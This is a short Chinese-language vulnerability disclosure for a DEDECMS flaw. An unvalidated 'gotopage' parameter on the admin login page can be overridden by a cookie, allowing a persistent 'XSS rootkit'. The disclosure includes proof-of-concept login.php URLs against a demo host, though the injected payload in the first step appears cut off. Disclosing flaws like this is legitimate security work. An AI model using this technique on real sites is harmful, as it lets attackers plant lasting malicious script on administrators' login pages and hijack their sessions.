DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY

影响版本：

DEDECMS全版本

 

漏洞描叙：

DEDECMS后台登陆模板中的gotopage变量未效验传入数据，导致XSS漏洞。

\dede\templets\login.htm

65行左右

由于DEDECMS的全局变量注册机制，该变量内容可以被COOKIE变量覆盖,COOKIE可以在客户端持久化存储，最终导致一个XSS ROOTKIT。

 

漏洞危害：

管理员在触发DEDECMS任意的XSS漏洞(如留言本XSS)后，可以通过该漏洞永久劫持覆盖gotopage变量，在DEDECMS的后台登陆页面永久嵌入任意的恶意代码。 

 

验证：

1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。

http://v57.demo.dedecms.com/dede/login.php?gotopage=">

2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

参考：

深掘XSS漏洞场景之XSS Rootkit[完整修订版]

http://www.80sec.com/%e6%b7%b1%e6%8e%98xss%e6%bc%8f%e6%b4%9e%e5%9c%ba%e6%99%af%e4%b9%8bxss-rootkit-%e4%bf%ae%e8%ae%a2.html